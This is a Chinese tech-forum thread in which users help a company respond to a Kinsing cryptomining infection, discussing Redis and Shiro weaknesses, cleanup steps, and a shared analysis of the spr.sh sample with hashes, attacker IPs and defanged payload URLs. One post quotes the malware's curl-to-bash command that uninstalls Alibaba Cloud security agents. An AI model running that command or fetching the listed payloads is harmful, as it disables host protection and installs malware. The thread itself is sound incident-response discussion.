公司服务器被攻击了！

我们公司防火墙和服务器也是打了，中了勒索……哎

@melsp 也是最近吗？ 搞定了吗。勒索就严重了。我们现在庆幸不是勒索。运维在疯狂加班。

部署到云服务器会不会好一些

之前个人的小鸡上遇到过类似的，是因为 redis 弱密码。。

这个我们公司的服务器也被植入挖矿病毒 好在只是挖矿而已，处理步骤 先把 网关了 再一个个把相关的进程文件删除 启动项删除 然后改 SSH 端口号 改密码 禁止远程 root 账号登录

服务器密码是否同一个？

@itemqq https://developer.aliyun.com/article/741602

从 ops 和 opsz 用户运行的程序入手查查

shiro 、weblogic 、jboss 、struts2 等等很多的框架漏洞都可以直接拿服务器权限。

有没有单独的日志服务器？如果转发了日志，可以根据日志回溯出攻击者如何攻破防御的。
如果只是网站框架漏洞，一般无法创建多个用户的定时任务，应该考虑是否还存在提权漏洞。
当然具体情况要具体分析，让运维和网安一起工作才是解决之道。

😂之前 jenkins 被注入过 后来关了 jenkins

我们之前的内网服务器被搞过相同的；后来查到原因是一个内网的 Redis 端口，被网管映射到公网 IP 上了，然后这 Redis 还没有密码。。。就被扫了。

之前遇到过，彻底清理后，基本原因就是 redis 密码和 shiro 版本

除了 80 、443 、22 ，还开了什么端口。

谢谢各位。redis 漏洞、scrapyd 漏洞、yarn 漏洞目前已知都可能被利用。开源框架果真有利有弊。。。
我再排查一下服务器日志。
另外这个 spr.sh 已经被我捕获到一份。感觉是针对阿里云的。获得权限进去后，先尝试用 curl http://update.aegis.aliyun.com/download/uninstall.sh | bash 卸载阿里云相关的东西。

刚大概看了下样本，spr.sh 被放进 crontab 用来定期一顿清理和杀别的进程，清理完最后会下载执行挖矿主体程序“kinsing.elf”。
从清理脚本看应该是有 root 权限，我觉得可以先看看服务器哪些应用是 root 跑的，缩小一下溯源范围。如果没有其他流量层和主机层的日志的话这个比较难去准确溯源调查。
我把关联的 IOC 整理了下，安全同事们看到这里顺便可以在自家的 NIDS/HIDS 里自查一下。

文件 Hash：
b099a4454a5ecc566f849747c14dec8accc96128f21cf228790a4b34d3ef1aea
75596a259a6cf7701da23e8220550216a559006acc2b8607aa9b0017e6c293d9
6e25ad03103a1a972b78c642bac09060fa79c460011dc5748cbb433cc459938b

IP：
185.191.32.198
194.38.20.199

URL：
hxxp://194.38.20.199/kinsing
hxxp://194.38.20.199/spr.sh
hxxp://194.38.20.199/cron.sh
hxxp://185.191.32.198/spr.sh （疑似已失效）

显然是 ops 和 opsz 这两个用户的程序有问题。
建议是关闭外网的 ip ，需要开放公网的时候通过负载均衡映射。

不能再经典的挖矿了，可以买个主机安全产品检测防护一下。

大概率 redis 对外了

@0x73346b757234 感谢大佬。～～ 很有帮助。
这个 ip 简直一样，请问大佬怎么获取到这个 ip 的。 😭。